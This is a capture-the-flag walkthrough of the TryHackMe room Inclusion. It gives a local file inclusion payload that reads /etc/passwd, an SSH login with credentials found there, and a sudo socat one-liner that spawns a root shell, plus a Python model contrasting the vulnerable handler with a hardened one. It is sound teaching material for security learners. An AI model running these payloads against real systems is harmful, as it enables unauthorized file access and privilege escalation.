WriteUp — THM Inclusion
A beginner-level LFI challenge
This is a writeup for the TryHackMe room Inclusion. It teaches the local file inclusion (LFI) vulnerability class: a web application that builds a filesystem path from user input and reads whatever that path points to.
Reconnaissance
Start by doing an nmap scan:
nmap -sC -sV -p- inclusion.thm
Starting Nmap 7.91 ( https://nmap.org ) at 2020-10-25 13:11 EET
Nmap scan report for inclusion.thm (10.10.135.218)
Host is up (0.050s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e6:3a:2e:37:2b:35:fb:47:ca:90:30:d2:14:1c:6c:50 (RSA)
| 256 73:1d:17:93:80:31:4f:8a:d5:71:cb:ba:70:63:38:04 (ECDSA)
|_ 256 d3:52:31:e8:78:1b:a6:84:db:9b:23:86:f0:1f:31:2a (ED25519)
80/tcp open http Werkzeug httpd 0.16.0 (Python 3.6.9)
|_http-title: My blog
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Only SSH and a Werkzeug (Python) web server on port 80, so let's take a look at the web server.
Web Server enumeration
Enumerating the web server from the homepage, we notice three links that select an article through a query-string parameter:
http://inclusion.thm/article?name=hacking
http://inclusion.thm/article?name=lfiattack
http://inclusion.thm/article?name=rfiattack
If there is an LFI vulnerability, the name parameter can be manipulated to make the application return files it never intended to serve. A quick directory-traversal guess immediately returns a file from the system:
http://inclusion.thm/article?name=../../../../../../../../../../../../etc/passwd
This can be shortened to remove the extra relative paths. Once the traversal reaches /, any further ../ segments are discarded, so the payload only needs as many as the directory the application reads from is deep (three here); the longer form is simply a safe first guess when the depth is unknown:
http://inclusion.thm/article?name=../../../etc/passwd
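To make the bug concrete, here is an added example (written for this writeup, not the room's real source) that models the article handler in Python, the language the scan reported for the server. It assumes a hypothetical layout in which the app reads articles/<name> under its working directory, and builds a throwaway directory tree with constructed sample files to stand in for the box. The vulnerable function joins the user-supplied name without any check; the hardened version resolves the path and refuses anything outside the articles directory; traversal_target shows why three ../ reach the same file as twelve.

```python
"""Model of the Inclusion article handler: the LFI beside a hardened version.

Added example, not the room's real source. It assumes (hypothetically) that the
app keeps articles in an `articles/` directory under its working directory and
reads `articles/<name>`; the real app may be laid out differently.
"""
import os
import tempfile
from pathlib import Path


def build_fake_fs() -> Path:
    """Build a throwaway directory tree standing in for the box. The files and
    their contents are constructed sample data, not taken from the target."""
    root = Path(tempfile.mkdtemp(prefix="inclusion-"))
    articles = root / "srv" / "app" / "articles"
    articles.mkdir(parents=True)
    (articles / "hacking").write_text("Article: hacking\n")
    (articles / "lfiattack").write_text("Article: lfiattack\n")
    (root / "etc").mkdir()
    (root / "etc" / "passwd").write_text("root:x:0:0:root:/root:/bin/bash\n")
    return root


def read_article_vulnerable(app_dir: Path, name: str) -> str:
    """The bug: the user-controlled name is joined to the articles directory
    with no normalisation or containment check, so '../' segments walk out of
    it and an absolute name replaces the prefix entirely (Path semantics)."""
    return (app_dir / "articles" / name).read_text()


def read_article_safe(app_dir: Path, name: str) -> str:
    """Hardened version: resolve the candidate (following symlinks, so a link
    planted inside articles/ cannot point back out) and refuse anything whose
    real location is not strictly inside the articles directory."""
    articles = (app_dir / "articles").resolve()
    candidate = (articles / name).resolve()
    if articles not in candidate.parents:
        raise PermissionError(f"refusing to serve {name!r}: outside {articles}")
    return candidate.read_text()


def traversal_target(articles_dir: str, name: str) -> str:
    """Where a traversal payload lands once '..' segments are collapsed.
    Segments that would climb above '/' are dropped, which is why a payload
    needs only as many '../' as the articles directory is deep; extra ones are
    harmless. The articles_dir value is an assumed path, not the box's."""
    return os.path.normpath(os.path.join(articles_dir, name))


if __name__ == "__main__":
    root = build_fake_fs()
    app = root / "srv" / "app"
    payload = "../../../etc/passwd"
    print("vulnerable:", read_article_vulnerable(app, payload).strip())
    try:
        read_article_safe(app, payload)
    except PermissionError as exc:
        print("hardened:", exc)
    for n in (3, 12):
        print(n, "levels ->",
              traversal_target("/srv/app/articles", "../" * n + "etc/passwd"))
```

The containment check compares resolved paths rather than looking for ".." in the string, so encoded or symlink-based variants are caught by the same rule; rejecting the request outright is preferable to "sanitising" the name, because stripping ../ once can be bypassed with ....// style payloads.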
/etc/passwd is a good first target since it lists every account on the system, which is very useful in enumeration:
root:x:0:0:root:/root:/bin/bash
...
falconfeast:x:1000:1000:falconfeast,,,:/home/falconfeast:/bin/bash #falconfeast:__REDACTED__
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
mysql:x:111:116:MySQL Server,,,:/nonexistent:/bin/false
But also, what is this? A username:password pair has been appended to /etc/passwd as a comment. Let's try to SSH in with it. It works! Grab the user flag and start rooting the box.
Privesc
Let's take a look at the sudo rights first, since we already have the user's password:
sudo -l
Matching Defaults entries for falconfeast on inclusion:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User falconfeast may run the following commands on inclusion:
    (root) NOPASSWD: /usr/bin/socat
Let's take a look at the socat entry on GTFOBins. The sudo escalation is a one-liner: socat wires our stdin to an exec'd /bin/sh, and because sudo runs socat as root, so is the shell it spawns. The shell has no tty, so expect no prompt; just type a command:
sudo socat stdin exec:/bin/sh
whoami
root
BOOM! And we are done with this easy box.